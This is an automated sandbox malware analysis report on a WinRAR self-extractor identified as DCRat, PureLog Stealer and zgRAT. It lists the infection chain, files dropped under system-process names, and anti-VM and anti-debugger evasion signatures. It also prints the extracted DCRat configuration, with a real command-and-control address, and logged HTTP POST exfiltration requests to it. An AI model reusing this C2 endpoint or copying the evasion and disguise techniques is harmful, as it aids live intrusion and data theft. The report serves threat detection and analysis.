Edit tour

Windows Analysis Report
9FwQYJSj4N.exe

Overview

General Information

Sample name:	9FwQYJSj4N.exe renamed because original name is a hash value
Original sample name:	9342BE038F6FF329AAFFDC2626F8D145.exe
Analysis ID:	1579262
MD5:	9342be038f6ff329aaffdc2626f8d145
SHA1:	5e2bc708ba51774175679f7cde6c9900c957bb42
SHA256:	396a47040ce6fbbaf684ae9d4c1abe7bc8901113d3c017f41276145d6a04a103
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Drops PE files with benign system names

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SGDT)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

9FwQYJSj4N.exe (PID: 6148 cmdline: "C:\Users\user\Desktop\9FwQYJSj4N.exe" MD5: 9342BE038F6FF329AAFFDC2626F8D145)

wscript.exe (PID: 1124 cmdline: "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 3572 cmdline: C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Providerbroker.exe (PID: 6204 cmdline: "C:\providerBrowserruntimeCrt/Providerbroker.exe" MD5: ADAE028E0A5A72D219A02BB06D92241A)

cmd.exe (PID: 3568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5512 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6764 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

BSlvAOjamepaXWJMhY.exe (PID: 5148 cmdline: "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe" MD5: ADAE028E0A5A72D219A02BB06D92241A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
9FwQYJSj4N.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
9FwQYJSj4N.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Windows\PrintDialog\pris\spoolsv.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\PrintDialog\pris\spoolsv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\ApplicationFrameHost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\providerBrowserruntimeCrt\Providerbroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\providerBrowserruntimeCrt\Providerbroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2080050228.00000000048E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2080638886.00000000048E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000000.2131916065.0000000000452000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000C.00000002.3319845623.0000000003810000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000C.00000002.3319845623.00000000039E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Providerbroker.exe PID: 6204	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: BSlvAOjamepaXWJMhY.exe PID: 5148	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.9FwQYJSj4N.exe.49354fb.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.9FwQYJSj4N.exe.49354fb.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.9FwQYJSj4N.exe.49364fb.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.9FwQYJSj4N.exe.49364fb.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.0.Providerbroker.exe.450000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.Providerbroker.exe.450000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\providerBrowserruntimeCrt\Providerbroker.exe, ProcessId: 6204, TargetFilename: C:\Windows\PrintDialog\pris\spoolsv.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\9FwQYJSj4N.exe", ParentImage: C:\Users\user\Desktop\9FwQYJSj4N.exe, ParentProcessId: 6148, ParentProcessName: 9FwQYJSj4N.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" , ProcessId: 1124, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T10:02:31.515294+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49734	89.23.96.180	80	TCP

ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T10:02:54.567893+0100	2048130	1	A Network Trojan was detected	192.168.2.5	49798	89.23.96.180	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 9FwQYJSj4N.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\BqwHRBKU.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\RRtweJUq.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\NsJXliNz.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\Desktop\BmbzgENi.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\GidQnkDb.log	Avira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
Source: C:\Users\user\Desktop\QURoIJFv.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Recovery\ApplicationFrameHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906

Found malware configuration

Source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	ReversingLabs: Detection: 79%
Source: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exe	ReversingLabs: Detection: 79%
Source: C:\Recovery\ApplicationFrameHost.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\AtVzwBvZ.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\GidQnkDb.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\IZCgKuwL.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\JXdofuLG.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\KYTGugDU.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\NJzXBuON.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\QURoIJFv.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\VIjnlGUj.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\VMyxesyD.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\VWRNVcdg.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\WJZFAsNx.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\YYEvrLib.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\YuFVHGXq.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\bnUEsCJp.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\fneLqjpL.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\gCMlaExJ.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\hgxdViOd.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\jaztMisT.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\ksDciByC.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\lWnUcfOW.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\lkWuMAXT.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\oitSpyyv.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\rxJbrpZI.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\wDeIoEvg.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\zFRrKozb.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\zsYipEjs.log	ReversingLabs: Detection: 50%
Source: C:\Windows\PrintDialog\pris\spoolsv.exe	ReversingLabs: Detection: 79%
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	ReversingLabs: Detection: 79%
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: 9FwQYJSj4N.exe	Virustotal: Detection: 59%			Perma Link
Source: 9FwQYJSj4N.exe	ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\HrJyYQpO.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\NJzXBuON.log	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BqwHRBKU.log	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\VIjnlGUj.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AtVzwBvZ.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RRtweJUq.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\NsJXliNz.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BmbzgENi.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HjZguhPI.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HAgyIDIK.log	Joe Sandbox ML: detected
Source: C:\Recovery\ApplicationFrameHost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\VMyxesyD.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9FwQYJSj4N.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["SQiDocn60p5igPZHgvkZipIORtqG4iK2FRWuhXyFf4g6iOZq7oF5C05nHTv5vhBSfDcO2pkJ6e3oIMpDUAJPdOzPWtmNl3U82ObfwKyRE59h6Re5oslvYwyQNN2ICXhC","886b964eacdf58df64ccd2e35a7cc93f02ef5b995bb1b61ec19d87c5f2d1fe93","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/","ImagepythonRequestLowGeocpuwpTemporary"]]

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

Unpacked PE file: 5.2.Providerbroker.exe.1260000.6.unpack

Source: 9FwQYJSj4N.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exe	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\81eb946674e99f	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Directory created: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Directory created: C:\Program Files\Common Files\81eb946674e99f	Jump to behavior

Source: 9FwQYJSj4N.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9FwQYJSj4N.exe

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0100A69B
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0102B348 FindFirstFileExA,	0_2_0102B348
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0101C220

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		5_2_00007FF84903B7C5
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		12_2_00007FF8490CB81D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49734 -> 89.23.96.180:80
Source: Network traffic	Suricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49798 -> 89.23.96.180:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: MAXITEL-ASRU MAXITEL-ASRU

Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
